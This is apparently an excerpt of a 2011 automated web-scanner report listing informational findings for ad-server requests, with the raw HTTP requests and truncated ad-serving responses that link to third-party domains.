Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUaGIdSlqXB8gTNDuT_OL7eWkwL7QDA3gBY2BgEGFgWnCTgSW7jYGR9zsDww0XBgYGTgYGRv0j_xZYQeVagXI_gHKuMLlNHp0ZuPRtvBk3GSrXAtT3E6jPDaZvo_lNE5z6zNP1cctJMDAwdS4BurMZaOYvoJnuMDMn6Uf4Q.Uw3NnLsc0bKofhll4Ol35cch3ZMadwyiW5XccpF.F1Daec34QQnHKuDRxQOYx46JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgETDcGXHKV3YLAeUZfI_rNYBSUeAtRkFGYHraycgPpBgMeJgZWZnZ.NkZORg5GbkYuRl5GHkZ.cCSLJmMIkA1SwvAOhTMIIIhTCKMokBh.V1cbMzYtC12ZwQ6B5hcL7nWCoCsZmAAAFGskws-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUVGIL2vn32CiWPiwQj5OTzmIjggADA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqR9VoXJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJBgYmDqXAP3QDDTzF9BMd5iZk_Qj_KFyGP7r5djmDZXDcEsvh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqBxGPHRIuN_GqU_CThuXvvaTOzfh0td.ckYtTrkTwouBYcuIU76yWwgoz.B7XK8BlIoCbzEKMgLT005GfiDFYMDHwMjMyMLEys_GyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XNyoRd42J3RqCjYIkW5AIGAPYfk5A-; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:35:18 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3928
Date: Mon, 09 May 2011 15:35:17 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1875839577?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUNRNOhbAPD5FIvSW2ZNjj_EMWeQlnZW8sdXNhLHQsMTMwNDk1NTMxODU2NSxjLDI4OTY2OSxwYyw2OTExMixhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL21wbVptWm1aLVQtYW1abVptWm41UHdBQUFBQUFBQXhBQUFBQUFBQUFERUFBQUFBQUFBQU1RT0RHYndnNjlDRmtTc1lkYTZiMnppV3JDY2hOQUFBQUFDNGhBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0IzQzA0QUVBOEJBZ1VDQUFRQUFBQUFmeHplSndBQUFBQS4vY25kPSFlUk1rQ3dqMjVRSVF4OGtLR0FBZzBjY0JLRTR4QUFBQUFBQUFERUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUGNXWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNzL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CQUZPcXF3bklUYlRZSm9YMGxBZi1qZkhLQ2RmcS1OTUJsNkdVN0JqWjU5SFNId0FRQVJnQklBQTRBVkNBeC1IRUJHREpob1dKaUtTRUVJSUJGMk5oTFhCMVlpMDJOelF6TmpJeU5USTFNakF5TlRjeW9BSEQ4djNzQTdJQkVYZDNkeTVqYzIxdmJtbDBiM0l1WTI5dHVnRUtNekF3ZURJMU1GOWhjOGdCQ2RvQklXaDBkSEE2THk5M2QzY3VZM050YjI1cGRHOXlMbU52YlM5Q2RYTnBibVZ6YzVnQ3dBekFBZ1RJQW9YU3p3cmdBZ0RxQWhBek1EQjRNalV3UTE5SFpXNWxjbUZzcUFNQjZBTnI2QU9UQmVnRG1BUG9BNHNKNkFPTUNmVURBZ1FBUlBVRElBQUFBT0FFQVlBRzZjU0Y5TVdRMW9reSZudW09MSZzaWc9QUdpV3F0eWdZWVkxV2pOYWV3eG1OVWV0WHZyWWs2a2paZyZjbGllbnQ9Y2EtcHViLTY3NDM2MjI1MjUyMDI1NzImYWR1cmw9Cg--/clkurl=">\n'+
'</script>
...[SNIP]...
Z0RtQVBvQTRzSjZBT01DZlVEQWdRQVJQVURJQUFBQU9BRUFZQUc2Y1NGOU1XUTFva3kmbnVtPTEmc2lnPUFHaVdxdHlnWVlZMVdqTmFld3htTlVldFh2cllrNmtqWmcmY2xpZW50PWNhLXB1Yi02NzQzNjIyNTI1MjAyNTcyJmFkdXJsPQo-&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=1875839577" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=1643675704" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

17.2. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=27888134820386770&clkurl=http://ib.adnxs.com/click/AQAAAAAA_D8AAAAAAAD8PwAAAAAAAAxAAAAAAAAADEAAAAAAAAAMQJ41jpUnrNkrSsYda6b2ziXpCchNAAAAAC4hAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gB3C04A9gUBAgUCAAQAAAAAbxbN4QAAAAA./cnd=!7hJ17Ai_kAMQx8kKGAAg0ccBKE4xAAAAAAAADEBCEwgAEAAYACABKP7__________wFIAFAAWPcWYABolgU./referrer=http%3A%2F%2Fwww.csmonitor.com%2FBusiness/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBXt6i6QnITcO4EKXvlQfzjoStCNfq-NMBl6GU7BjZ59HSHwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHD8v3sA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc5gC1g3AAgTIAoXSzwrgAgDqAg4zMDB4MjUwQl9Nb25leagDAegDa-gDkwXoA5gD6AOLCegDjAn1AwIEAET1AyAAAADgBAGABunEhfTFkNaJMg%26num%3D1%26sig%3DAGiWqtzXujmj6x9ljlxi_jlsMLM-st1i2A%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUlVjb46xel_B1pRvtUstYmBf.mMUDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2rqW8YoHJtQLnvQDkXmNyRfwuscOnb5NGZgUvfxptxk6FyLUAzfwLNdIOZudH8pglOfebp.rjlJIDu7FwC9EMz0MxfQDPdYWZO0o_wh8ph.K.XY5s3VA7DLb0cLv245DqyY07hlEtyu45TLsLrGk45vwkhOOVcGzigchjx0CHhfhunPgk7bVz62k_u3IRLX_vJGbU45U4ILwaGLSNO.cpuIaA8g.9xvQYGLgaG5eaMQMUMgbcYBYEU505GfiDFYMDHwMjMxMLPysjGyM7IwcjJyMXIzcjDyMvIB1bAkskoAlS3tACsS8EMIhjCJMIoChSW38XDwohL62J3sIXA1JsWBLIKCADRapOK

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUA0JKRlc1ZV6E31_Bd0WGv_ToRnQDA3gBY2BgEGFgWnCTgSW7lYGR9wcDww1XBgYGTgYGRv2raSc_45RLfcMAlWsD6vsO1OcC03fk3wIrXPo2eXRm4NK38WbcZKhcC9DMn0Az3WBmbjS_aYJTn3m6Pm45CaA7O5cA_dcMNPMX0Ex3mJmT9CP8oXIYfu_l2OYNlcNwSy.HSz8uuY7smFM45ZLcruOUi_C6hlPOb0IITjnXBg6oHEY8dEi438apT8JOG5e.9pM7N.HS135yRi0w_Bhxyld2CwHlGXyP6zUwcDEwLDdnBCpmCLzFKAikOHcy8gMpBgN.BiYmRmZ.FkZWRjZGdkYORk5GLkZuRh5GXkY.sBKWTEYRoMqlBWB9CmYQwRAmEUZRoLD8Lh7cWhe7g60Ep98vILcwMAAAkcyWNQ--; Domain=.amgdgt.com; Expires=Wed, 08-Jun-2011 15:36:14 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3920
Date: Mon, 09 May 2011 15:36:13 GMT

_289669_amg_acamp_id=172249;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
</script> <script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>\n'+
'\n'+
'<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/253732017/direct/01/rnd=1987910106?click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUwTUL4C0hX73GwRuwlgMiXZ7PuHNnZW8sdXNhLHQsMTMwNDk1NTM3NDA2OCxjLDI4OTY2OSxwYyw2OTExMixhYywxNzIyNDksbyxOMC1TMCxsLDU1MzY1LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FRQUFBQUFBX0Q4QUFBQUFBQUQ4UHdBQUFBQUFBQXhBQUFBQUFBQUFERUFBQUFBQUFBQU1RSjQxanBVbnJOa3JTc1lkYTZiMnppWHBDY2hOQUFBQUFDNGhBQUMxQUFBQWxnSUFBQUlBQUFESHBBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFDd0ItZ0IzQzA0QTlnVUJBZ1VDQUFRQUFBQUFieGJONFFBQUFBQS4vY25kPSE3aEoxN0FpX2tBTVF4OGtLR0FBZzBjY0JLRTR4QUFBQUFBQUFERUJDRXdnQUVBQVlBQ0FCS1A3X19fX19fX19fX3dGSUFGQUFXUGNXWUFCb2xnVS4vcmVmZXJyZXI9aHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNzL2NsaWNrZW5jPWh0dHA6Ly9hZGNsaWNrLmcuZG91YmxlY2xpY2submV0L2FjbGs_c2E9bCZhaT1CWHQ2aTZRbklUY080RUtYdmxRZnpqb1N0Q05mcS1OTUJsNkdVN0JqWjU5SFNId0FRQVJnQklBQTRBVkNBeC1IRUJHREpob1dKaUtTRUVJSUJGMk5oTFhCMVlpMDJOelF6TmpJeU5USTFNakF5TlRjeW9BSEQ4djNzQTdJQkVYZDNkeTVqYzIxdmJtbDBiM0l1WTI5dHVnRUtNekF3ZURJMU1GOWhjOGdCQ2RvQklXaDBkSEE2THk5M2QzY3VZM050YjI1cGRHOXlMbU52YlM5Q2RYTnBibVZ6YzVnQzFnM0FBZ1RJQW9YU3p3cmdBZ0RxQWc0ek1EQjRNalV3UWw5TmIyNWxlYWdEQWVnRGEtZ0Rrd1hvQTVnRDZBT0xDZWdEakFuMUF3SUVBRVQxQXlBQUFBRGdCQUdBQnVuRWhmVEZrTmFKTWcmbnVtPTEmc2lnPUFHaVdxdHpYdWptajZ4OWxqbHhpX2psc01MTS1zdDFpMkEmY2xpZW50PWNhLXB1Yi02NzQzNjIyNTI1MjAyNTcyJmFkdXJsPQo-/clkurl=">\n'+
'</script>
...[SNIP]...
b0E1Z0Q2QU9MQ2VnRGpBbjFBd0lFQUVUMUF5QUFBQURnQkFHQUJ1bkVoZlRGa05hSk1nJm51bT0xJnNpZz1BR2lXcXR6WHVqbWo2eDlsamx4aV9qbHNNTE0tc3QxaTJBJmNsaWVudD1jYS1wdWItNjc0MzYyMjUyNTIwMjU3MiZhZHVybD0K&j=" target="_blank"><img border="0" src="http://view.atdmt.com/TLC/view/253732017/direct/01/rnd=1987910106" /></a></noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=69112&c5=172249&c6=&cv=1.3&cj=1&rn=1158518083" style="display:none" width="0" height="0" alt="" />\n'+
'\n'+
'<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=adcon&cid=480&t=72"></script>
...[SNIP]...

17.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4300.Google/B5350353.10

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N4300.Google/B5350353.10;sz=300x250;pc=gdncID5TgIAAAA;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BULngQgrITcOnDJHZsAeGwKDBDdiymZsCyL6SpCWQpurvRAAQARgBIIKq8w44AFCY-bG__f____8BYMmGhYmIpIQQoAGo5r7SA7IBE3d3dy50aGVyZXB1YmxpYy5jb226AQozMDB4MjUwX2FzyAEJ2gEgaHR0cDovL3d3dy50aGVyZXB1YmxpYy5jb20vaG9tZS_gAQKYAowLuAIYwAIEyALwmsMcqAMB6AOSA-gDtSroA-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=;ord=68443379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:37:40 GMT
Expires: Mon, 09 May 2011 15:37:40 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Tue Mar 29 13:01:47 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
A-kH6AOzKegDuyr1AwAAAEQ&num=1&sig=AGiWqtzhtV9arjYrbkbunikl44fw8R6R4Q&client=ca-pub-8560941387472259&adurl=https%3a%2f%2fwww.hyatt.com/gp/en/offers/possibilities-promo.jsp%3Fsrc%3Dagn_phd_GP_ba_google"><img src="http://s0.2mdn.net/1326154/1-Hyatt_GP_300x250_Backup.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4492.134426.1009314592321/B4140786.136

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N4492.134426.1009314592321/B4140786.136;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B6_E_rgnITePPD9OHlAeDi5ihCL_w4IwC7-ek-RKXyI6WHAAQARgBII3w5QU4AGDJhoWJiKSEEKAB9YrU7gOyARF3d3cuY3Ntb25pdG9yLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzc-ABB4ACAZgCmgi4AhjAAgTIAp-OoBjgAgDqAg83Mjh4OTBCX0dlbmVyYWyQA6QDmAPgA6gDAdEDrGtosNr1JsXoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=;ord=177302960? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7444
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:35:13 GMT
Expires: Mon, 09 May 2011 15:35:13 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Oct 27 10:20:44 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
g=AGiWqtySFU-EVKXe7DWg6DiYJpO2ITEOyw&client=ca-pub-6743622525202572&adurl=http%3a%2f%2fwww.progressive.com/insurance/nyp/display.aspx%3F%26code%3D9903600230%26utm_medium%3Dbanner%26utm_campaign%3Dnyp"><img src="http://s0.2mdn.net/1384245/1010_auto_NYP_SliderFlo_interactive_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5895.133090.0460774079521/B4563625.8

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5834
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:17 GMT
Expires: Mon, 09 May 2011 15:36:17 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Mar 09 17:03:44 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0/2%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=100500&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.restaurantfavorites.com/"><img src="http://s0.2mdn.net/2789604/RFMcGrill_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.6. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2883.6441.USATODAY.COM/B5327539.11

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N2883.6441.USATODAY.COM/B5327539.11;sz=300x250;pc=[TPAS_ID];click=http%3A//gannett.gcion.com/adlink%2F5111%2F798269%2F0%2F170%2FAdId%3D1587637%3BBnId%3D1%3Bitime%3D955400653%3Bkey%3Dcw27%2Bcw296%2Bcw22%2Bcw5%2Bcw461%2Bcw9%2Bcw145%3Blink%3D;ord=955400653? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/stormcenter/default.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 37042
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 15:36:42 GMT
Expires: Mon, 09 May 2011 15:36:42 GMT
Discarded: true

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
7%3BBnId%3D1%3Bitime%3D955400653%3Bkey%3Dcw27%2Bcw296%2Bcw22%2Bcw5%2Bcw461%2Bcw9%2Bcw145%3Blink%3Dhttp://www.subaru.com/weather/index.html?site=1056706&placement=62098467&ad=5327539&creative=41821555"><IMG SRC="http://s0.2mdn.net/1762894/PID_1610335_Subaru_WWM_300x250.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...

17.7. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.128132.INTERCLICK/B4640114.15

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/N3175.128132.INTERCLICK/B4640114.15;sz=300x250;click=http://a1.interclick.com/icaid/128531/tid/88285d39-c26a-4993-96e1-8a5d87de37e5/click.ic?;ord=634405378967220244? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 15:36:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 453

